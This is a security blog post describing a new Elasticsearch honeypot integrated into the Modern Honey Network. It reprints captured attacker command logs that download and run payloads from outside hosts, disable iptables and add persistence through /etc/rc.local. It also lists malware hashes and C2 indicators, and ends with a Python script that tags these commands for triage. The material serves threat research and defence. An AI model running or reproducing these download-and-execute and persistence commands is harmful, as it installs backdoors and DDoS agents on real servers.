May 1, 2015 - Jason Trost
MHN Support for Elastichoney a New Elasticsearch Honeypot

<p><img src="https://cdn.filestackcontent.com/bE227npBQ1OtOamLmano" style="float: right; width: 150px; height: 149px; margin-left: 20px;"/> This week ThreatStream Labs extended the <a href="http://threatstream.github.io/mhn/" target="_blank">Modern Honey Network (MHN)</a> project to add support for a new honeypot named <a href="https://github.com/jordan-wright/elastichoney" target="_blank">elastichoney</a>. MHN is a free and open source (LGPL) project that enables anyone to quickly and easily deploy and manage honeypots. Elastichoney was developed by <a href="http://jordan-wright.github.io/blog/2015/03/23/introducing-elastichoney-an-Elasticsearch-honeypot/" target="_blank">Jordan Wright</a> (<a href="https://twitter.com/jw_sec" target="_blank">@jw_sec</a>). It is a honeypot that emulates some <a href="https://www.elastic.co/products/Elasticsearch" target="_blank">Elasticsearch</a> API endpoints with the goal of capturing exploitation attempts against Elasticsearch servers that are vulnerable to <a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1427" target="_blank">CVE-2015-1427</a>. We added <a href="https://github.com/jordan-wright/elastichoney/pull/3" target="_blank">hpfeeds support</a> for it and integrated it with MHN by adding an <a href="https://github.com/threatstream/mnemosyne/pull/18" target="_blank">ingest module</a>, a <a href="https://github.com/threatstream/hpfeeds/pull/12" target="_blank">visualization module</a>, <a href="https://github.com/threatstream/hpfeeds-logger/pull/2/files" target="_blank">SIEM integration</a>, and a <a href="https://github.com/threatstream/mhn/pull/159" target="_blank">deployment script</a>.</p><p>After a software update, any MHN user can deploy and quickly leverage the data provided by this awesome honeypot in their MHN server or SIEM. 
After completing the integration we deployed 50 of these honeypots and started to get interesting hits almost immediately.</p><p>Here is a small sample of the command logs extracted from the elastichoney logs (Note: all URLs and IPs have been defanged). All of the scanning activity that we've seen has originated from IPs in China, with the exception of one exploit attempt originating from Walnut City, California.</p><pre>
Attacker: 61[.]160[.]215[.]111
Location: Nanjing, China
Organization: China Telecom jiangsu province backbone
Sensor: 32
Duration: 0.0 secs
Log:
[2015-04-29T09:12:56.588-0700] wget -O /tmp/ruvn hxxp://122[.]224[.]48[.]28:8000/tooles

Attacker: 222[.]186[.]15[.]246
Location: Nanjing, China
Organization: China Telecom jiangsu province backbone
Sensor: 22
Duration: 15,544.016 secs
Log:
[2015-04-29T20:31:52.988-0700] service iptables stop
[2015-04-29T20:31:53.276-0700] rm -r /tmp/*
[2015-04-29T20:31:58.570-0700] wget -O /tmp/xiaoqiu hxxp://121[.]42[.]221[.]14:666/xiaoqiu
[2015-04-29T20:32:03.871-0700] chmod 777 /tmp/xiaoqiu
[2015-04-29T20:32:09.161-0700] nohup /tmp/xiaoqiu &gt; /dev/null 2&gt;&amp;1
[2015-04-29T20:32:14.432-0700] /tmp/xiaoqiu
[2015-04-29T20:32:19.708-0700] ./tmp/xiaoqiu
[2015-04-29T20:32:24.970-0700] wget -O /tmp/xiaoqiu32 hxxp://121[.]42[.]221[.]14:666/xiaoqiu32
[2015-04-29T20:32:30.217-0700] chmod 777 /tmp/xiaoqiu32
[2015-04-29T20:32:35.501-0700] nohup /tmp/xiaoqiu32 &gt; /dev/null 2&gt;&amp;1
[2015-04-29T20:32:40.750-0700] /tmp/xiaoqiu32
[2015-04-29T20:32:46.000-0700] ./tmp/xiaoqiu32
[2015-04-29T20:32:51.273-0700] wget -O /tmp/xiaoqiu hxxp://121[.]42[.]221[.]14:666/xiaoqiu
[2015-04-29T20:32:56.536-0700] su root
[2015-04-29T20:33:01.812-0700] chmod 777 /tmp/xiaoqiu
[2015-04-29T20:33:07.061-0700] nohup /tmp/xiaoqiu &gt; /dev/null 2&gt;&amp;1
[2015-04-29T20:33:12.312-0700] /tmp/xiaoqiu
[2015-04-29T20:33:17.572-0700] ./tmp/xiaoqiu
[2015-04-29T20:33:22.843-0700] wget -O /tmp/xiaoqiu32 hxxp://121[.]42[.]221[.]14:666/xiaoqiu32
[2015-04-29T20:33:28.809-0700] su root
[2015-04-29T20:33:34.411-0700] chmod 777 /tmp/xiaoqiu32
[2015-04-29T20:33:39.672-0700] nohup /tmp/xiaoqiu32 &gt; /dev/null 2&gt;&amp;1
[2015-04-29T20:33:44.928-0700] /tmp/xiaoqiu32
[2015-04-29T20:33:50.201-0700] ./tmp/xiaoqiu32
[2015-04-30T00:50:57.004-0700] wget -O /tmp/xiao3 hxxp://121[.]42[.]221[.]14:666/xiao3

Attacker: 61[.]176[.]222[.]160
Location: shenyang, China
Organization: China Unicom Liaoning
Sensor: 11
Duration: 44.18 secs
Log:
[2015-04-29T06:22:05.595-0700] rm *
[2015-04-29T06:22:06.063-0700] curl -o /tmp/zlwanby hxxp://61[.]176[.]222[.]160:222/zlwanby
[2015-04-29T06:22:11.509-0700] wget -c hxxp://61[.]176[.]222[.]160:222/zlwanby
[2015-04-29T06:22:16.962-0700] chmod 777 /tmp/./zlwanby
[2015-04-29T06:22:22.418-0700] /tmp/./zlwanby
[2015-04-29T06:22:27.870-0700] nohup /tmp/zlwanby &gt; /dev/null 2&gt;&amp;1
[2015-04-29T06:22:33.355-0700] echo "cd /tmp/"&gt;&gt;/etc/rc.local
[2015-04-29T06:22:38.838-0700] echo "/tmp/zlwanby"&gt;&gt;/etc/rc.local
[2015-04-29T06:22:44.306-0700] echo "/etc/init.d/iptables stop"&gt;&gt;/etc/rc.local
[2015-04-29T06:22:49.775-0700] rm /tmp/*

Attacker: 222[.]186[.]21[.]166
Location: Nanjing, China
Organization: China Telecom jiangsu province backbone
Sensor: 26
Duration: 3,766.057 secs
Log:
[2015-04-29T06:21:32.547-0700] rm *
[2015-04-29T06:21:33.269-0700] curl -o /tmp/udpg hxxp://23[.]234[.]25[.]203:15826/udpg
[2015-04-29T06:21:40.166-0700] wget -c hxxp://23[.]234[.]25[.]203:15826/udpg
[2015-04-29T06:21:40.482-0700] chmod 777 /tmp/udpg
[2015-04-29T06:21:45.807-0700] /tmp/udpg
[2015-04-29T06:21:46.135-0700] rm /tmp/*
[2015-04-29T07:23:57.416-0700] rm *
[2015-04-29T07:23:57.665-0700] curl -o /tmp/udpg hxxp://23[.]234[.]25[.]203:15826/udpg
[2015-04-29T07:24:02.902-0700] wget -c hxxp://23[.]234[.]25[.]203:15826/udpg
[2015-04-29T07:24:08.135-0700] chmod 777 /tmp/udpg
[2015-04-29T07:24:13.369-0700] /tmp/udpg
[2015-04-29T07:24:18.604-0700] rm /tmp/*

Attacker: 199[.]83[.]94[.]78
Location: Walnut, California, United States
Organization: Psychz Networks
Sensor: 31
Duration: 0.0 secs
Log:
[2015-04-30T05:07:27.683-0700] wget -O /tmp/wocao hxxp://198[.]13[.]96[.]38:7878/wocao

Attacker: 117.21.176.64
Location: Nanchang, China
Organization: China Telecom Jiangxi
Sensor: 1
Duration: 361.757 secs
Log:
[2015-04-30T04:07:11.639-0700] service iptables stop
[2015-04-30T04:07:36.973-0700] rm -r /tmp/*
[2015-04-30T04:08:40.523-0700] wget -O /tmp/Hostys hxxp://117[.]21[.]176[.]64:4899/http
[2015-04-30T04:08:45.831-0700] chmod 777 /tmp/Hostys
[2015-04-30T04:08:51.443-0700] nohup /tmp/Hostys &gt; /dev/null 2&gt;&amp;1
[2015-04-30T04:08:56.705-0700] /tmp/Hostys
[2015-04-30T04:09:08.743-0700] ./tmp/Hostys
[2015-04-30T04:09:36.338-0700] wget -O /tmp/Hostus hxxp://117[.]21[.]176[.]64:4899/http
[2015-04-30T04:10:11.101-0700] chmod 777 /tmp/Hostus
[2015-04-30T04:10:47.887-0700] nohup /tmp/Hostus &gt; /dev/null 2&gt;&amp;1
[2015-04-30T04:11:13.986-0700] /tmp/Hostus
[2015-04-30T04:11:49.684-0700] ./tmp/Hostus
[2015-04-30T04:11:58.686-0700] wget -O /tmp/Hostys1 hxxp://117[.]21[.]176[.]64:4899/http
[2015-04-30T04:12:03.955-0700] su root
[2015-04-30T04:12:09.238-0700] chmod 777 /tmp/Hostys1
[2015-04-30T04:12:14.547-0700] nohup /tmp/Hostys1 &gt; /dev/null 2&gt;&amp;1
[2015-04-30T04:12:22.983-0700] /tmp/Hostys1
[2015-04-30T04:12:28.298-0700] ./tmp/Hostys1
[2015-04-30T04:12:33.672-0700] wget -O /tmp/http hxxp://117[.]21[.]176[.]64:4899/http
[2015-04-30T04:12:42.031-0700] su root
[2015-04-30T04:12:57.485-0700] chmod 777 /tmp/http
[2015-04-30T04:13:02.752-0700] nohup /tmp/http &gt; /dev/null 2&gt;&amp;1
[2015-04-30T04:13:08.126-0700] /tmp/http
[2015-04-30T04:13:13.396-0700] ./tmp/http

Attacker: 61[.]176[.]220[.]162
Location: shenyang, China
Organization: China Unicom Liaoning
Sensor: 19
Duration: 43.611 secs
Log:
[2015-04-30T00:12:56.107-0700] rm *
[2015-04-30T00:12:56.500-0700] curl -o /tmp/zlbyy hxxp://61[.]176[.]220[.]162:222/zlbyy
[2015-04-30T00:13:01.933-0700] wget -c hxxp://61[.]176[.]220[.]162:222/zlbyy
[2015-04-30T00:13:07.340-0700] chmod 777 /tmp/./zlbyy
[2015-04-30T00:13:12.716-0700] /tmp/./zlbyy
[2015-04-30T00:13:18.113-0700] nohup /tmp/zlbyy &gt; /dev/null 2&gt;&amp;1
[2015-04-30T00:13:23.541-0700] echo "cd /tmp/"&gt;&gt;/etc/rc.local
[2015-04-30T00:13:28.930-0700] echo "/tmp/zlbyy"&gt;&gt;/etc/rc.local
[2015-04-30T00:13:34.333-0700] echo "/etc/init.d/iptables stop"&gt;&gt;/etc/rc.local
[2015-04-30T00:13:39.718-0700] rm /tmp/*
</pre><p>Of the files that we could retrieve, all were ELF 32-bit Linux binaries; all are now on VirusTotal and are identified as Linux backdoors or DDoS agents.</p><table border="1" style="border-collapse:collapse;width:100%;margin-bottom:25px;"><tbody><tr><th style="background:#5f7d8e;color:#fff;font-weight:bold;padding:8px;line-height:1.2em;">Filename</th><th style="background:#5f7d8e;color:#fff;font-weight:bold;padding:8px;line-height:1.2em;">MD5</th><th style="background:#5f7d8e;color:#fff;font-weight:bold;padding:8px;line-height:1.2em;">VT Detections</th><th style="background:#5f7d8e;color:#fff;font-weight:bold;padding:8px;line-height:1.2em;">Filetype</th></tr><tr><td style="background:#fff;padding:8px;line-height:1.2em;">http</td><td style="background:#fff;padding:8px;line-height:1.2em;">ab84831f6adf1e3183dc947855ef1364</td><td style="background:#fff;padding:8px;line-height:1.2em;"><a href="https://www.virustotal.com/en/file/25a23e4b096263f4fc3f3508191f3f8df92a95c8fb853821b4f983156509053e/analysis/" target="_blank">27 of 57</a></td><td style="background:#fff;padding:8px;line-height:1.2em;">ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.2.5, not stripped</td></tr><tr><td style="background:#e0e6e9;padding:8px;line-height:1.2em;">tooles</td><td style="background:#e0e6e9;padding:8px;line-height:1.2em;">083c14e97952c70434ad5a458e1b0255</td><td style="background:#e0e6e9;padding:8px;line-height:1.2em;"><a 
href="https://www.virustotal.com/en/file/b4e69d685be5e71d14d44dfc1123e447778044c94198d2752801dc19101086fe/analysis/" target="_blank">21 of 55</a></td><td style="background:#e0e6e9;padding:8px;line-height:1.2em;">ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, stripped</td></tr><tr><td style="background:#fff;padding:8px;line-height:1.2em;">xiao3</td><td style="background:#fff;padding:8px;line-height:1.2em;">beef6284e842b20370565f2289123a7c</td><td style="background:#fff;padding:8px;line-height:1.2em;"><a href="https://www.virustotal.com/en/file/569c055289c6cee9c6fa3fba0b14c4cf17517ce11aa6ec1e3eac8f4a281af325/analysis/" target="_blank">17 of 56</a></td><td style="background:#fff;padding:8px;line-height:1.2em;">ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, stripped</td></tr><tr><td style="background:#e0e6e9;padding:8px;line-height:1.2em;">zlbyy</td><td style="background:#e0e6e9;padding:8px;line-height:1.2em;">818e28906d4e9c131c965bff4e07145b</td><td style="background:#e0e6e9;padding:8px;line-height:1.2em;"><a href="https://www.virustotal.com/en/file/698648e067d39035933babbfe6d8ae998fdb2b0e3d89b6ea321a5ec802fbab5a/analysis/" target="_blank">14 of 56</a></td><td style="background:#e0e6e9;padding:8px;line-height:1.2em;">ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, stripped</td></tr><tr><td style="background:#fff;padding:8px;line-height:1.2em;">zlwanbq</td><td style="background:#fff;padding:8px;line-height:1.2em;">818e28906d4e9c131c965bff4e07145b</td><td style="background:#fff;padding:8px;line-height:1.2em;"><a href="https://www.virustotal.com/en/file/698648e067d39035933babbfe6d8ae998fdb2b0e3d89b6ea321a5ec802fbab5a/analysis/" target="_blank">14 of 56</a></td><td style="background:#fff;padding:8px;line-height:1.2em;">ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, stripped</td></tr></tbody></table><p>As you can see, each of these IPs 
were attempting to exploit servers they thought to be running a vulnerable version of Elasticsearch. It looks like their intent was to install DDoS tools on these machines to leverage them in attacks against other networks. It is highly recommended that you not expose your Elasticsearch servers directly to the Internet, but if you do, you should definitely upgrade to the latest version.</p><p>We sandboxed each of these samples in our home grown linux malware sandbox and were able to extract the following network indicators from two of the binaries.</p><table border="1" style="border-collapse:collapse;width:100%;margin-bottom:25px;"><tbody><tr><th style="background:#5f7d8e;color:#fff;font-weight:bold;padding:8px;line-height:1.2em;">MD5</th><th style="background:#5f7d8e;color:#fff;font-weight:bold;padding:8px;line-height:1.2em;">IP</th><th style="background:#5f7d8e;color:#fff;font-weight:bold;padding:8px;line-height:1.2em;">Port</th><th style="background:#5f7d8e;color:#fff;font-weight:bold;padding:8px;line-height:1.2em;">Protocol</th></tr><tr><td style="background:#fff;padding:8px;line-height:1.2em;">beef6284e842b20370565f2289123a7c</td><td style="background:#fff;padding:8px;line-height:1.2em;">21[.]42[.]221[.]14</td><td style="background:#fff;padding:8px;line-height:1.2em;">10991</td><td style="background:#fff;padding:8px;line-height:1.2em;">TCP</td></tr><tr><td style="background:#e0e6e9;padding:8px;line-height:1.2em;">818e28906d4e9c131c965bff4e07145b</td><td style="background:#e0e6e9;padding:8px;line-height:1.2em;">123[.]131[.]52[.]13</td><td style="background:#e0e6e9;padding:8px;line-height:1.2em;">28099</td><td style="background:#e0e6e9;padding:8px;line-height:1.2em;">TCP</td></tr></tbody></table><p>Here is a splunk dashboard we created to explore this data. 
This dashboard will be incorporated into the <a href="https://splunkbase.splunk.com/app/2707/" target="_blank">MHN Splunk app</a> so any user that has integrated their MHN with Splunk can explore this data and build customized alerts in Splunk.</p><p><img src="https://cdn.filestackcontent.com/vHaA3p47SaO4H5YWkIiG" style="width: 700px; height: 554px;"/></p><p>To conclude, we recently added support for a new Elasticsearch honeypot named elastichoney to the Modern Honey Network (MHN) project. This enables anyone that has deployed MHN to easily deploy elastichoney and collect threat intelligence on who is scanning for and attempting to exploit Elasticsearch servers. If this sort of work interests you, ThreatStream is <a href="http://threatstream.com/careers">hiring both researchers and engineers</a> and if you want to be protected from threats like this, <a href="https://ui.threatstream.com/registration/">sign up to try ThreatStream Optic</a>.</p>
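<p>The command sequences in the logs above all follow one pattern: fetch a payload into /tmp with wget or curl, chmod it, run it, and in some sessions persist it through /etc/rc.local and stop iptables. The following Python is an added example, not code from the original post, from elastichoney or from MHN: it parses elastichoney-style "[timestamp] command" lines, tags each command with the behaviour it represents and produces a per-session triage summary a SIEM rule or analyst could act on. The sample lines are copied from the last session above; the tag names and the URL and path patterns are this example's own assumptions.</p>

```python
import posixpath
import re

# Constructed sample: ten lines copied from one attacker session in the
# elastichoney command logs quoted above (IPs and URLs stay defanged).
SAMPLE_LOG = """\
[2015-04-30T00:12:56.107-0700] rm *
[2015-04-30T00:12:56.500-0700] curl -o /tmp/zlbyy hxxp://61[.]176[.]220[.]162:222/zlbyy
[2015-04-30T00:13:01.933-0700] wget -c hxxp://61[.]176[.]220[.]162:222/zlbyy
[2015-04-30T00:13:07.340-0700] chmod 777 /tmp/./zlbyy
[2015-04-30T00:13:12.716-0700] /tmp/./zlbyy
[2015-04-30T00:13:18.113-0700] nohup /tmp/zlbyy > /dev/null 2>&1
[2015-04-30T00:13:23.541-0700] echo "cd /tmp/">>/etc/rc.local
[2015-04-30T00:13:28.930-0700] echo "/tmp/zlbyy">>/etc/rc.local
[2015-04-30T00:13:34.333-0700] echo "/etc/init.d/iptables stop">>/etc/rc.local
[2015-04-30T00:13:39.718-0700] rm /tmp/*
"""

LINE_RE = re.compile(r"^\[(?P<ts>[^\]]+)\]\s+(?P<cmd>\S.*)$")
URL_RE = re.compile(r"hxxps?://[\w\[\].-]+(?::\d+)?/\S*")  # defanged URLs only
# Behaviour rules for the stages seen above; one command may trigger several tags.
RULES = [
    ("download", lambda c: c.split()[0] in ("wget", "curl")),
    ("make_exec", lambda c: c.startswith("chmod ") and "777" in c),
    ("exec_tmp", lambda c: re.match(r"^(nohup\s+)?\.?/tmp/", c) is not None),
    ("persistence", lambda c: ">>/etc/rc.local" in c.replace(" ", "")),
    ("firewall_off", lambda c: "iptables stop" in c),
    ("cleanup", lambda c: c.startswith("rm ")),
]

def tag_command(cmd):
    """Return the behaviour tags one command triggers, in RULES order."""
    return [tag for tag, pred in RULES if pred(cmd)]

def triage(text):
    """Summarise a session: command count, behaviour tags, payload URLs, dropped paths."""
    tags, urls, paths, count = set(), {}, set(), 0
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # skip anything that is not "[timestamp] command"
        cmd = m.group("cmd")
        count += 1
        tags.update(tag_command(cmd))
        urls.update(dict.fromkeys(URL_RE.findall(cmd)))  # ordered, de-duplicated
        for p in re.findall(r"/tmp/[\w./]*", cmd):
            norm = posixpath.normpath(p)  # "/tmp/./zlbyy" -> "/tmp/zlbyy"
            if norm != "/tmp":  # ignore bare directory references such as "rm /tmp/*"
                paths.add(norm)
    return {"count": count, "tags": sorted(tags), "urls": list(urls), "paths": sorted(paths)}
```

Feeding a whole elastichoney log through triage() one session at a time gives the download URLs and dropped file names to block or hunt for, and the persistence and firewall tags flag the sessions that went beyond a simple download-and-run.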
